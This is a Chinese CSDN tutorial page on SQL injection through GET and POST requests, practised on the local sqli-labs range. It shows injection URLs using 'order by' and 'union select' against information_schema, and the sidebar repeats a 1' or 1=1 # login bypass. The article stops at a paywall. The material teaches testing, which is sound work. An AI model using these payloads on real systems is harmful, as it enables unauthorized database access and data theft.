Web安全第6讲 - SQL注入 - GET和POST请求

最新推荐文章于 2024-04-07 00:01:09 发布
最新推荐文章于 2024-04-07 00:01:09 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yauger/article/details/104379261
版权

一、SQL注入

GET和POST请求

  • GET提交,请求的数据会附在URL之后(就是把数据放置在HTTP协议头中),以?分割URL 和传输数据,多个参数用&连接

  • POST提交:把提交的数据放置在是HTTP包的包体中。

    因此,GET提交的数据会在地址栏中显示出来,而POST提交,地址栏不会改变

二、 GET基于报错的SQL注入

通过url中修改对应的ID值,为正常数字、字符(单引号,双引号,括号)、反斜线来探测url中是 否存在注入点

2.1 get基于报错的SQL注入利用

  1. order by判断字段数

    http://127.0.0.1/sqli/Less-1/?id=1’ order by 1 --+

  2. 利用union select联合查询,获取表名

     http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.`tables` where table_schema=database() --+

  3. 利用union select联合查询,获取字段名

最低0.47元/天 解锁文章
Yauger
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入 - GET注入与POST注入 一看就会
米兔-miny的博客
12-31 3473
本文章SQL注入的显错注入(GET注入)和POST注入,一看就能学会。模仿里面的例子在靶场试试手,你就是下一个黑客帝王。
sql注入简要说明GET等方法的区别
qq_44881113的博客
08-08 482
常见的提交方式:GET ,POST,REQUEST 下面是演示脚本 g代表GET方法的参数 p代表POST方法的参数 c代表COOKIE的参数 r代表REQUEST的参数 s代表SERVER的参数 <?php $get = $_GET['g'];//接受参数名g的值并赋值给变量get echo $get; //输出变量名g的数据 $post = $_POST['p']; //接受参数名p的值并赋值给变量post echo $post ;//输出变量post $c = $_COOKIE['c
sql注入/ 状态码 / get与post
baymax的博客
07-05 1085
sql注入/状态码 / get与post
SQL注入---POST注入
最新发布
zhoutong2323的博客
04-07 643
Webshell文章介绍过post提交和get提交的区别,这里不再赘述get方式提交URL的参数信息,post方式则是将信息保存在HTTP请求的body传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
webgote的例子(4)Sql注入(SelectGET)
时光凉春衫薄的博客
03-25 179
SQL Injection (Select/GET) 本章内容 (查询显示要注意的错误) 这里面我们看一下 movie的数值,选择表单的当我们选择的二个的时候 move的值也变成了第二个,选择表单第三个第四个的值的时候move的值也相应的进行了改变,通过这个我们不难推出这个查询的结果和move一一对应的关系。 我们不妨再个包看看,get方法请求的路径里面还是将这个值拿到数据库...
GET和POST的区别
weixin_30645617的博客
08-28 132
1.GET把参数包含在URLPOST通过request body传递参数。 2.GET在浏览器回退时是无害的,而POST会再次提交请求。 3.GET产生的URL地址可以被Bookmark,而POST不可以。 4.GET请求会被浏览器主动cache,而POST不会,除非手动设置。 5.GET请求只能进行url编码,而POST支持多种编码方式。 6.GET...
GET和POST 区别
nowchange的博客
06-21 1960
get 不安全 post 相对安全 get是基于‘问号传参’把信息传递给服务器的,容易被URL劫持 POST是基于请求主体 相对来说不好劫持。在登陆 注册涉及安全性交互操作 要用post 另外get 会产生不可控制的缓存(无法基于JS控制,浏览器自主记忆的缓存) 会产生缓存是因为:连续多次向相同的地址(并且传递的参数信息也是相同的),发送请求,浏览器会把之前获取的数据从缓存拿到返回,导致...
web学习之sql注入
weixin_45508323的博客
11-22 404
记我滴web学习--sql注入前言对sql注入原理的理解工具页面请求方式与注释请求方式:GET和POSTGET请求POST请求hackbarburp suite注释方式:#和--+判断注入点 前言 第一次写博客0.0,尝试梳理记录一下自己学习的知识点,也方便日后复习叭。 如果能帮到有需要的人那可真是太好了。 对sql注入原理的理解 sql 注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我认为sql注入就是将要注入的sql命令置于表单
GET和POST区别及理解
忧容骑士的博客
08-17 207
get和post区别
Web安全深度剖析(张柄帅)
07-25
第6章 上传漏洞 106 6.1 解析漏洞 106 6.1.1 IIS解析漏洞 106 6.1.2 Apache解析漏洞 109 6.1.3 PHP CGI解析漏洞 110 6.2 绕过上传漏洞 110 6.2.1 客户端检测 112 6.2.2 服务器端检测 115 6.3 文本编辑器上传漏洞 123...
网站安全网关 v3.7.5.rar
07-17
Safe3WAF是国内第一款免费的Linux轻量级的反向代理Web安全网关,采用类似nginx的占有内存少、高并发架构。作为网页服务器的前置,不但可以抵御各种黑客攻击,还可以高速内存cache服务器缓存相关请求来提高Web服务器...
Safe3网站安全网关 3.1
06-26
Safe3WAF是国内第一款免费的Linux轻量级的Web反向代理安全网关,采用类似nginx的占有内存少、高并发架构。作为网页服务器的前置,不但可以抵御各种黑客攻击,还可以cache服务器缓存相关请求来提高Web服务器的速度,...
Java面试宝典-经典
03-28
2、HTTP请求的GET与POST方式的区别 85 3、解释一下什么是servlet; 85 4、说一说Servlet的生命周期? 86 5、Servlet的基本架构 86 6、SERVLET APIforward() 与redirect()的区别? 86 7、什么情况下调用doGet()和...
Java学习笔记-个人整理的
12-19
\contentsline {chapter}{Contents}{2}{section*.1} {1}Java基础}{17}{chapter.1} {1.1}基本语法}{17}{section.1.1} {1.2}数字表达方式}{17}{... {16}Web基础}{215}{chapter.16} {16.1}HTML}{215}{section.16.1} {...
get和post的区别(转)
小鱼的学习之路的博客
04-16 531
本文转自:https://www.cnblogs.com/logsharing/p/8448446.html 转发收藏一下,方便晚上回家慢慢读! GET和POST是HTTP请求的两种基本方法,要说它们的区别,接触过WEB开发的人都能说出一二。 最直观的区别就是GET把参数包含在URLPOST通过request body传递参数。 你可能自己写过无数个GET和POST请求,或者已经看过很多权威网...
GET和POST区别
happy_xiahuixiax的博客
06-05 387
1、GET提交,请求的数据会附在URL之后(就是把数据放置在HTTP协议头),以?分割URL和传输数据,多个参数用&连接;例 如:login.action?name=hyddd&password=idontknow&verify=%E4%BD%A0 %E5%A5%BD。如果数据是英文字母/数字,原样发送,如果是空格,转换为+,如果是文/其他字符,则直接把字符串用BASE64加密,得出如: %E4
99%的人都理解错了HTTPGET与POST的区别
Dream It Possible
09-29 2595
本文转自微信公众号WebTechGardenGET和POST是HTTP请求的两种基本方法,要说它们的区别,接触过WEB开发的人都能说出一二。最直观的区别就是GET把参数包含在URLPOST通过request body传递参数。你可能自己写过无数个GET和POST请求,或者已经看过很多权威网站总结出的他们的区别,你非常清楚知道什么时候该用什么。当你在面试被问到这个问题,你的内心充满了自信和喜悦
web渗透—— SQL基于GET POST注入
王嘟嘟的博客
04-16 4873
0x00 前言 之前我们学习了这些知识。 0x01 小知识 1.万能登录 1' or 1=1 # 2. 判断字段数 uname=123' order by 2 # &amp;passwd=&amp;submit=Submit 3. 联合查询 uname=123' union select 1,2 # &amp;passwd=&amp;submit=Submit ...
SQL注入POST注入和HEAD注入
qq_68233961的博客
07-10 1304
SQL注入POST注入和HEAD注入
wireshark-sql注入探测
06-10
Wireshark是一个流量分析工具,可以用于SQL注入探测。下面是一些探测SQL注入攻击的步骤: 1. 启动Wireshark,并开始捕获网络流量。 2. 使用过滤器来过滤HTTP/HTTPS流量,以便找到可能存在SQL注入攻击的流量。 3. 找到HTTP/HTTPS请求的参数,这些参数可能会受到SQL注入攻击。可以通过查看HTTP请求和响应报文来确定参数的名称和值。 4. 对于可能受到SQL注入攻击的参数,可以使用Wireshark的“Follow TCP Stream”功能,查看完整的HTTP请求和响应报文,以便确认是否存在SQL注入攻击。 5. 在HTTP请求,可以检查参数的类型和格式,以查看是否存在潜在的SQL注入漏洞。例如,可以检查参数是否为数字类型或字符串类型,是否包含特殊字符等。 6. 在HTTP响应,可以检查响应的内容,以查看是否存在异常或错误信息,例如SQL语法错误或数据库连接错误等。 7. 如果发现SQL注入漏洞,需要及时修复漏洞,例如对输入参数进行严格的输入检查和过滤,使用参数化查询等措施,以避免SQL注入攻击。 总之,Wireshark是一个功能强大的流量分析工具,可以用于SQL注入探测。通过对HTTP/HTTPS流量的分析和检查,可以发现潜在的SQL注入漏洞,并及时修复漏洞,以保护应用程序的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值